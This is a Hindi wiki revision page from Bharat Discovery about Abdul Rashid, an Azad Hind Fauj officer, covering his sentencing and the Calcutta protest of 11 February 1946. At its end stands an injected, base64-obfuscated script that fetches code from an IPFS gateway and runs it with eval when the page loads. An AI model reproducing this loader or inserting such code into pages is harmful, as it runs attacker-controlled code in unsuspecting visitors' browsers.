अब्दुल रशीद: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "आजाद" to "आज़ाद")
m (Text replace - "सजा " to "सज़ा ")
Line 1: Line 1:
*अब्दुल रशीद आज़ाद हिन्द फौज में सम्मिलित होकर प्रमुख सैन्य अधिकारी बने।  
*अब्दुल रशीद आज़ाद हिन्द फौज में सम्मिलित होकर प्रमुख सैन्य अधिकारी बने।  
*[[सुभाष चन्द्र बोस|सुभाष]] की मृत्यु के बाद ब्रिटिश सरकार ने आज़ाद हिन्द फौज का दमन किया तथा [[कलकत्ता]] में 7 वर्ष की कारावास की सजा सुनाई गईं।  
*[[सुभाष चन्द्र बोस|सुभाष]] की मृत्यु के बाद ब्रिटिश सरकार ने आज़ाद हिन्द फौज का दमन किया तथा [[कलकत्ता]] में 7 वर्ष की कारावास की सज़ा सुनाई गईं।  
*इस पर [[11 फरवरी]], 1946 ई. को कलकत्ता में विद्रोह हो गया।  
*इस पर [[11 फरवरी]], 1946 ई. को कलकत्ता में विद्रोह हो गया।  
*प्रतिवादी जुलूस का नेतृत्व मुस्लिम लीग के छात्रों ने किया, किन्तु [[कांग्रेस]] तथा कम्युनिस्ट पार्टी के छात्र संगठन में सम्मिलित हुए।  
*प्रतिवादी जुलूस का नेतृत्व मुस्लिम लीग के छात्रों ने किया, किन्तु [[कांग्रेस]] तथा कम्युनिस्ट पार्टी के छात्र संगठन में सम्मिलित हुए।  

Revision as of 11:21, 27 August 2011

  • अब्दुल रशीद आज़ाद हिन्द फौज में सम्मिलित होकर प्रमुख सैन्य अधिकारी बने।
  • सुभाष की मृत्यु के बाद ब्रिटिश सरकार ने आज़ाद हिन्द फौज का दमन किया तथा कलकत्ता में 7 वर्ष की कारावास की सज़ा सुनाई गईं।
  • इस पर 11 फरवरी, 1946 ई. को कलकत्ता में विद्रोह हो गया।
  • प्रतिवादी जुलूस का नेतृत्व मुस्लिम लीग के छात्रों ने किया, किन्तु कांग्रेस तथा कम्युनिस्ट पार्टी के छात्र संगठन में सम्मिलित हुए।
  • छात्रों ने धारा 144 का उल्लंघन किया तथा पुलिस ने उन पर लाठीचार्ज किया। बाद में आज़ाद हिन्द फौज के अन्य अधिकारियों के साथ रशीद को भी छोड़ दिया गया।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

नागोरी, डॉ. एस.एल. “खण्ड 3”, स्वतंत्रता सेनानी कोश (गाँधीयुगीन), 2011 (हिन्दी), भारतडिस्कवरी पुस्तकालय: गीतांजलि प्रकाशन, जयपुर, पृष्ठ सं 13।

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>